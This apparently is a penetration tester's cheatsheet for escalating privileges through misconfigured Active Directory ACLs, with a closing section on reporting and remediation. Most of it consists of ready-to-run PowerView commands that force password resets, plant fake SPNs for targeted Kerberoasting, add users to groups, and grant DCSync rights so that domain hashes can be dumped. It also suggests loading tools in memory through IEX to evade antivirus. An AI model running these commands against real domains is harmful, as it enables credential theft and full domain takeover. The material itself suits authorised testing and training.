π‘οΈ Methodology Checklist
- Run BloodHound β review all ACL paths from owned principals
- Identify: GenericAll, GenericWrite, WriteDACL, WriteOwner, ForceChangePassword
- GenericAll on user: reset password or targeted Kerberoasting
- GenericWrite on user: set SPN β Kerberoast
- WriteDACL: grant self DCSync rights β run DCSync
- WriteOwner: take ownership β grant self full control
- ForceChangePassword:
Set-DomainUserPassword(no current pass needed) - Document full ACL chain for report
π― Operational Context
Use when: BloodHound identifies ACL edges β WriteDACL, GenericAll, GenericWrite, ForceChangePassword, WriteOwner on target objects. Think Dumber First: BloodHound shortest paths to DA almost always include at least one ACL edge. Identify the ACL β understand what right it grants β abuse it. WriteDACL = grant yourself any right. GenericAll = all rights on object. Skip when: No BloodHound data β enumerate ACLs manually with PowerView first.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
Find-InterestingDomainAcl -ResolveGUIDs | PowerView β scan domain for exploitable ACL misconfigurations |
Get-DomainObjectAcl -Identity [USER] -ResolveGUIDs | PowerView β get ACEs for a specific object |
Set-DomainUserPassword -Identity [USER] -AccountPassword (ConvertTo-SecureString '[NEWPASS]' -AsPlainText -Force) | Abuse ForceChangePassword β reset target userβs password |
Set-DomainObject -Identity [USER] -Set @{serviceprincipalname='fake/spn'} | Abuse GenericWrite β assign fake SPN for targeted Kerberoasting |
Add-DomainGroupMember -Identity '[GROUP]' -Members '[USER]' | Abuse AddSelf/AddMembers β add user to a group |
Get-DomainGroupMember -Identity '[GROUP]' | Verify group membership after adding |
Remove-DomainGroupMember -Identity '[GROUP]' -Members '[USER]' | Revert group membership change |
Set-DomainObject -Identity [USER] -Clear serviceprincipalname | Remove fake SPN assigned during GenericWrite abuse |
π¬ Deep Dive & Workflow
ACL Overview
Access Control Lists (ACLs) define which principals have access to AD objects and what they can do. Key distinction:
- DACL β Discretionary ACL: grants/denies access
- SACL β System ACL: generates audit logs
- ACE β single entry within an ACL (principal SID + rule type + access mask)
No DACL rule: Object with no DACL = full access to everyone. Empty DACL = access denied to everyone.
Vulnerability scanners cannot detect ACL misconfigurations β manual enumeration or BloodHound is required.
Finding Exploitable ACLs
Import-Module .\PowerView.ps1
Find-InterestingDomainAcl -ResolveGUIDsThis resolves GUIDs to human-readable right names. Focus on ACEs where your compromised user (or groups itβs in) has non-standard rights over high-value targets.
BloodHound query: Outbound Control Rights on any user node β shows all objects the user can control and how.
Exploitable ACE Types
| Right | Target | Exploitation |
|---|---|---|
ForceChangePassword | User | Reset password without knowing current one |
GenericWrite | User | Assign fake SPN β targeted Kerberoast |
GenericWrite | Group | Add users to group |
GenericAll | User/Computer | Full control β Kerberoast, reset password, or LAPS read |
AddSelf | Group | Add yourself to the group |
AddMembers | Group | Add any user to the group |
WriteDACL | Object | Write new ACEs β grant yourself DCSync rights |
ReadGMSAPassword | gMSA | Extract Group Managed Service Account password |
Attack Workflows
ForceChangePassword:
$NewPass = ConvertTo-SecureString 'NewP@ssw0rd123!' -AsPlainText -Force
Set-DomainUserPassword -Identity wley -AccountPassword $NewPassGenericWrite β Targeted Kerberoasting:
# Assign fake SPN
Set-DomainObject -Identity damundsen -Set @{serviceprincipalname='notahacker/LEGIT'}
# Now Kerberoast that account
Get-DomainUser -Identity damundsen | Get-DomainSPNTicket -Format Hashcat
# Clean up
Set-DomainObject -Identity damundsen -Clear serviceprincipalnameAddSelf/AddMembers β Group Escalation:
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members wley
Get-DomainGroupMember -Identity 'Help Desk Level 1' # verify
# ... abuse the access ...
Remove-DomainGroupMember -Identity 'Help Desk Level 1' -Members wley # revertWriteDACL β DCSync:
# Grant yourself DCSync rights over the domain object
Add-DomainObjectAcl -TargetIdentity "DC=INLANEFREIGHT,DC=LOCAL" -PrincipalIdentity wley -Rights DCSyncThen use secretsdump.py or Mimikatz DCSync as the modified user.
Operational Notes
- These are destructive operations β they modify the live AD environment
- Document every change: what was modified, when, the original value
- Revert all changes immediately after demonstrating impact
- Always consult the client before executing password resets or group membership changes in production
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| PowerView Set-DomainObjectAcl fails | Execution policy or AV | Load via IEX; run from memory; ensure targeting correct object DN |
| ForceChangePassword blocked by GPO | Fine-grained password policy | Policy applies to target account; still works but new password must meet PSO requirements |
| GenericWrite on user but no shell | Targeted Kerberoasting | Add fake SPN: Set-DomainObject [USER] -Set @{serviceprincipalname='fake/FQDN'}; Kerberoast the SPN |
| WriteDACL applied but no effect | Replication delay on DC | Wait 60 seconds for AD replication; re-check with Get-DomainObjectAcl |
| BloodHound shows ACL but PowerView canβt confirm | Different data collection time | Re-run SharpHound collection; ACLs change; stale BloodHound data misleads |
π Reporting Trigger
Finding Title: Active Directory ACL Misconfiguration Enables Privilege Escalation Impact: Misconfigured ACLs (GenericAll, WriteDACL, ForceChangePassword) on AD objects allow a low-privileged user to escalate to Domain Admin without exploiting any software vulnerability, purely through legitimate AD operations. Root Cause: Excessive AD object permissions accumulated through IT operations without periodic ACL review. No monitoring on ACL modification or sensitive object permission grants. Recommendation: Conduct AD ACL audit using BloodHound or Purple Knight. Remove excessive permissions on sensitive objects (Domain Admins, krbtgt, GPOs). Implement AD Tiering model. Alert on ACL modifications to Tier 0 objects via Microsoft Defender for Identity.